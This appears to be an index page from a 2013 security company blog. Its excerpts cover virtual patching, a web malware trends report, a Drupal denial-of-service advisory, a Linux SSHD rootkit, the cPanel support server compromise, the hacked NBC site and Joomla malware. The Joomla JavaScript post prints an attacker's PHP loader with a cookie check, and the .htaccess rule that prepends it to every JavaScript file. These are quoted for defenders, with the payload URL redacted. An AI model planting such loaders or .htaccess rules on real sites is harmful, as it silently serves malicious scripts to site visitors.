Virtual Patching for Websites with Sucuri CloudProxy

March 11, 2013 by 5 Comments

All software has bugs, and some bugs can lead to security vulnerabilities. Vulnerabilities can be extremely dangerous when your software is running over the web, allowing anyone to reach and try to attack it. That’s why patching and keeping web applications updated is so important.
Sucuri Cloud Proxy

The reality is there is no shortage of websites running outdated Joomla installs, or outdated WordPress, or name your favorite CMS. There are also plenty of websites running themes/templates with known vulnerabilities, or forgotten plugins that are being exploited in the wild. The #1 excuse for keeping these web applications outdated is that their websites will break.

We often hear things like “My theme was heavily modified, so I can’t update it”, or “I am afraid it will break some functionality if I update this plugin”, or “I modified core files so now I am stuck”, or even “My web developer left us and nobody knows how this piece of code works”.

Read More

Filed Under: cloudproxy, sucuri, virtual patching, waf Tagged With: , , ,

2012 Web Malware Trends Report Summary

March 7, 2013 by 4 Comments

Sucuri is a website security company focused on the detection and remediation of web malware. In 2012, via our SiteCheck scanner, we scanned 9,953,729 unique domains. This small report is based on the data we were able to compile from that platform and our analysis of that same data.

2012 Web Malware Trend Report Summary

The Foundation

Healthy Website View

We consider a site to be healthy when we cannot identify any unauthorized modification of its content. If any type of malware including injections, SPAM, defacements, etc. are found on a site, or if it is blacklisted by any major security company or search engine, we consider it to be compromised. Based on this view, only 74% of the sites we scan were deemed to be healthy. All the others were either blacklisted or had some malicious injection on them.

  • Total unique domains scanned and analyzed: 9,953,729
  • Sites in which a malicious injection was identified: 15%
  • Sites in which a malicious injection was identified and it was also blacklisted: 4%
  • Sites that were only blacklisted: 7%

Note that the 15% represents unique domains that were classified malicious only by our scanner via our detection mechanism. The blacklisted percentage is based on data made available by the following blacklist API’s:

  • Google
  • McAfee
  • Yandex
  • Norton
  • PhishTank


Read More

Filed Under: Malware, report, research, sucuri Tagged With: , , , ,

Drupal Core Vulnerability Released – Denial of Service – Advisory SA-CORE-2013-002

February 22, 2013 by 1 Comment

As if the week wasn’t exciting enough, Drupal has released a core vulnerability that leaves it susceptible to Denial of Service attacks.

Metadata for this vulnerability is:

Advisory ID: DRUPAL-SA-CORE-2013-002
Project: Drupal core
Version: 7.x
Date: 2013-February-20
Security risk: Critical
Exploitable from: Remote
Vulnerability: Denial of service

Description of the vulnerability:

Drupal core’s Image module allows for the on-demand generation of image derivatives. This capability can be abused by requesting a large number of new derivatives which can fill up the server disk space, and which can cause a very high CPU load.

This vulnerability has been patched and it’s recommended that all Drupal sites upgrade to the latest version, 7.20.

I will say this about this announcement, I kind of wish other platforms would do something similar to disclose security issues to the public. Kudos Drupal security team for your approach to disclosure.

Filed Under: sucuri

Linux Based SSHD Rootkit Floating The Interwebs

February 22, 2013 by 9 Comments

For the past couple of days we have been a lot of discussion on a number of forums about a potential kernel rootkit making its rounds on the net. Interesting enough when we wrote about the case it wasn’t being picked up by anyone, today however it’s being picked up my an number of AV’s .

In case you don’t see it, a month and change ago it was at 0 detections of 46 and today it’s 20+ detections of 46. Nice!

That being said, what we found a month ago and what is being discussed today are two different things.

The Discussion

What is important to understand is the differentiating factor between what we found and what is being reported, is that in our case it was a full modification of SSHD. In this case, a module is being injected to modify the libraries used by SSHD.

Read More

Filed Under: sucuri

cPanel Inc. Server Compromised

February 22, 2013 by 4 Comments

It’s unclear on the specifics, but it appears the following letter is going out to cPanel users that have submitted a ticket in the last 6 months:

From: no-reply@cpanel.net
Sent: Friday, February 22, 2013 12:48 AM
To: ***********

Subject: Important Security Alert (Action Required)

Salutations,

You are receiving this email because you have opened a ticket with our support staff in the last 6 months. cPanel, Inc. has discovered that one of the servers we utilize in the technical support department has been compromised. While we do not know if your machine is affected, you should change your root level password if you are not already using ssh keys. If you are using an unprivileged account with “sudo” or “su” for root logins, we recommend you change the account password. Even if you are using ssh keys we still recommend rotating keys on a regular basis.

As we do not know the exact nature of this compromise we are asking for customers to take immediate action on their own servers. cPanel’s security team is continuing to investigate the nature of this security issue.

–cPanel Security Team

The cPanel product is very popular and used by hosts like Bluehost, HostGator, InMotion and many others. They in turn service 100′s of thousands of website owners website owners. While the scale of the compromise is unknown, an attacker targeting an environment like this is surely interested in one thing – data.

While the extent of the compromise is still unclear, it looks to have happened some time in the past 6 months. You can see the discussion here: http://forum.whmcs.com/showthread.php?68611-cPanel-support-compromised&p=296646, the user Infopro, product evangelist, is confirming that there was a compromise and action should be taken by all product users.

There is more discussion occurring on this thread as well http://www.hostingdiscussion.com/web-hosting-discussion/32211-cpanel-support-compromised.html

Highly recommend that any hosting company that uses the cPanel product force a reset of all account credentials.

******Update: Feb 22, 2013 – 16:16 PST********************

Interestingly enough, one of our engineers was also notified by their host, WiredTree, of a possible correlation between the cPanel compromise and the recent rumblings about a root-level exploit in RedHat/CentOS servers. On February 18th, they sent out the following notice:

I am writing you tonight to inform you that we have disabled access to port 22 (default SSH port) on your server as temporary precautionary security measure. Our security team has good reason to believe there is a root-level exploit in the wild for RedHat/CentOS servers as compromises have been reported on WebHostingTalk, Reddit, as well as on our own network and at other providers we have talked to. There have been a number of similarities in the attacks and that is why we have decided it is best to block this port temporarily until the attack vector is determined.

The discussion they are referring to can be found here and here.

Today, WiredTree, sent out the following email in response to our analysts inquiry for more information:

We recently emailed you to inform you that we temporarily disabled access to port 22 (default SSH port) on your server as a precautionary security measure. This block has now been lifted.

Our security team had been following some wide spread reports of root level compromises over the course of a couple of weeks. As time went on more and more were being reported, and we saw a handful on our network. One thing all of the servers compromised had in common was that SSHd was enabled with password authentication. We blocked SSHd temporarily as a precautionary measure, however we have since learned that SSHd was not the actual culprit.

We have been informed by cPanel that one of their servers in their Technical Support department was compromised and after further investigation, we have found that servers that were compromised had a cPanel ticket opened at one point where root level SSH access was given to cPanel Support so they could log in from their support offices. This extends back as far back to tickets being opened with cPanel support in October 2012.

Can the two issues be related? Are any other hosts seeing similar issues and care to give more information? If this is in fact true then this is a pretty serious concern, not just for hosts, but website owners alike that depend on these products for their day to day administration and management.

Filed Under: sucuri

Website Malware – Fixing Joomla SPAM Hacks – Conditional Payloads

February 22, 2013 by 1 Comment

Our Senior Malware Engineer, Fioravante Cavallari, is at it again. I think he has made it his personal mission in life to expel all Joomla hacks, he loves them that much – true story.. ;)

In all seriousness, he found another gem yesterday. It’s well written; it includes comments explaining what they are doing, uses proper syntax, it was broken up and sprinkled throughout another good file generating no errors, it wasn’t obfuscated and it leverages good variable naming conventions. What more can we ask for, right?!?!?!

Don’t ask how we found it, a true gentlemen never discloses his nightly affairs.

The Pretty Payload – Nice Conditional Malware

A few months ago I wrote about Conditional Malware, we’d categorize this one into the same family. In my post it was a very simple explanation and code base, you could clearly see the IP’s being filtered and what it was doing, here we have to think a bit. Remember, you’re not likely to find it in tact like this, it’ll likely be broken and sprinkled through out your file. Here you go:

Read More

Filed Under: awareness, hacked, joomla, Malware, Spam, sucuri Tagged With: , , , ,

NBC Website HACKED – Be Careful Surfing

February 21, 2013 by 17 Comments

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

Screen Shot 2013-02-21 at 11.15.51 AM

If you are visiting it from Chrome or Firefox would get the following warning:

Screen Shot 2013-02-21 at 11.18.14 AM

Read More

Filed Under: awareness, blacklist, blacklisted, hacked, Malware, security, sucuri Tagged With: , , ,

Sneaky Joomla Web Malware – JavaScript Infections

February 19, 2013 by 1 Comment

So the past week has been interesting, we have been having fun with a few JavaScript infections that really forced us to put on our thinking hats. Our Senior Malware Engineer, Fioravante Cavallari, actually found the payload and dissected it – thank goodness for products based on human-intelligence. It was so interesting that we felt compelled to write about it. It very accurately represents an evolution in the types of attacks we’re seeing, specifically as to the their creative nature.

If it were 24 months ago, JavaScript infections would be straight forward. They would be right in the JavaScript file, usually leveraging the document.write object or something similar. Take it back 12 months and we’d see the introduction of the rogue Apache modules, maybe not the introduction but when they were becoming more common place, generating the same injections. Granted, both of these approaches are still actively used today, but now we start adding things like the self-licking ice cream cone approach we wrote about and today’s scenario, which we’ll coin, adding junk to the trunk.

So What’s the Scenario?!?

In retrospect, it’s very simple. Append the payload to the file, hence adding junk to the trunk, similar in concept to what we are seeing with the Apache modules, but leveraging .htaccess.

This is how they are doing it:

First:

They have a payload on the server that is anything but the normal files you’d expect, i.e., HTML, JS, PHP, CSS, etc.., in this scenario it was a ShockWaveFile (.swf):

<?php
if (!$_COOKIE['utmzz'])
 {
setcookie('utmzz',time(),time()+60*60*24*7,'/');
header('Content-Type: application/x-javascript');
?>
document.write('<script type="text/javascript" src="[some not so nice payload]"></script>');
<?php
 }
header('Content-Type: application/x-javascript');

Second:

You then auto_append that rogue file to all JS files, oh which by the way, you treat as PHP:

<files ~ "\.js$">
SetHandler application/x-httpd-php
php_value auto_prepend_file [path to your rogue file]
php_flag display_errors Off
</files>

Keeping it Simple

Just like that, the attacker is able to append bad payloads to all your JavaScript files. All the while, you spend your valuable time looking through all your JS files, pulling your hair out, and low and behold, it’s not in the files. Yes, very annoying, I know. In any event, right now we’re seeing these types of attacks on Joomla sites more than any CMS.

I wouldn’t place too much thought into that, let’s keep the drama low folks. I don’t think it’s for any reason other than different breeds of attackers. Some groups are more particular to one platform over another and as they come up with tactics it spreads, at some point it jumps the fence and it’ll only be a matter of time before other platforms start seeing similar attack patterns.

Don’t Forget About Cache!!

When cleaning up the mess, removing the .htaccess and the bad rogue file alone won’t do the trick. It’s already been appended to all your files and in Joomla that means you have to use the core tools to purge all your files – easiest way. If you were to navigate to the site directly you, and your visitors, would still get hit with the JavaScript payload. So, log into your administrator panel and purge all the cached files via tools menu options.

Cheers!

If you find yourself in a similar situation send us a note at info@sucuri.net. Or sign up and we’ll get things situated, http://sucuri.net.

Filed Under: awareness, hacked, htaccess, joomla, Malware, research, sucuri

WordPress Plugin: Easy Digital Downloads – Security Flaw Discovered and Patched

February 15, 2013 by 6 Comments

Last night we were contacted by Adam Pickering about a security flaw discovered in Easy Digital Downloads (EDD), a free WordPress eCommerce plugin that allows you to sell digital downloads. If you use EDD and haven’t done so already, please make sure to upgrade to Version 1.4.4.2 immediately!

The plugin author, Pippin Williamson received word about the flaw within hours of it being validated, and had a patched version up on the WordPress Plugin Directory within the hour.

Read More

Filed Under: plugins, sucuri, vulnerability, WordPress Tagged With: , , , , ,

Various Shades of Malware – Abusing Your Resources

February 14, 2013 by Leave a Comment

We often write about very clear cut cases of malware activity. The attacker is leveraging your traffic, redirecting it to other locations, or injecting things like iFrames in an attempt to perform some type of drive-by-download. These are obviously very clear cut cases of malware and nefarious activities. But what about others?

By others I mean abusing system resources. This can be done through bot networks, spam emails and even using your box as a proxy. None of these are things you’ll ever pick up via any remote scanner as they never present themselves remotely. It’s also why we have to start evolving our ideals and remediation to move beyond the application tier and focus on the web server.

A perfect example is what we came across today.

In this example the attacker has injected a file called gate.php, when you navigate to via your URI you come see this:

Read More

Filed Under: awareness, hacked, Malware, sucuri Tagged With: , ,
«Older Posts
Newer Posts»